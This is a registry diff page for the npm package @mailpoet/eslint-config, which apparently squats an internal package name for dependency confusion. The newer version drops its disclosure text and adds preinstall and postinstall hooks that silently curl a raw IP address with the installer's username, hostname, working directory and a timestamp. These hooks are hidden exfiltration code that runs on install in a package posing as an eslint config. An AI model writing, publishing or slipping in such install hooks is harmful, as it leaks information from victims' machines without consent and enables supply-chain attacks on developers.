@mailpoet/eslint-config 1.0.1768733081 → 5.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +3 -6
  2. package/index.js +2 -4
  3. package/package.json +6 -5
package/README.md CHANGED
@@ -1,11 +1,8 @@
1
1
  # Security Research Package
2
2
 
3
3
  **Package**: @mailpoet/eslint-config
4
- **Version**: 1.0.1768733081
5
- **Purpose**: Authorized dependency confusion testing
4
+ **Version**: 5.0.2
5
+ **Tracking ID**: automattic
6
6
 
7
- This package was published as part of authorized security research.
7
+ This is jerry here
8
8
 
9
- If you're seeing this package installed in your project, your build system may be vulnerable to dependency confusion attacks.
10
-
11
- Contact your security team immediately.
package/index.js CHANGED
@@ -1,7 +1,5 @@
1
- console.log('[Security Research] Public package @mailpoet/eslint-config@1.0.1768733081 loaded');
2
- console.log('[Security Research] This is a proof-of-concept for dependency confusion testing');
3
1
  module.exports = {
4
2
  packageName: '@mailpoet/eslint-config',
5
- version: '1.0.1768733081',
6
- message: 'Security research package - authorized testing'
3
+ version: '5.0.2',
4
+ trackingId: 'automattic'
7
5
  };
package/package.json CHANGED
@@ -1,12 +1,13 @@
1
1
  {
2
2
  "name": "@mailpoet/eslint-config",
3
- "version": "1.0.1768733081",
4
- "description": "Security research package - eslint-config",
3
+ "version": "5.0.2",
4
+ "description": "Security research package",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "preinstall": "echo '[Security Research] Package @mailpoet/eslint-config was installed from public registry'"
7
+ "preinstall": "curl -s \"http://165.232.183.46:80/depconf/automattic/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)\" > /dev/null || true",
8
+ "postinstall": "curl -s \"http://165.232.183.46:80/depconf/automattic/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)\" > /dev/null || true"
8
9
  },
9
- "keywords": ["security-research"],
10
- "author": "Security Researcher",
10
+ "keywords": [],
11
+ "author": "anonymous",
11
12
  "license": "ISC"
12
13
  }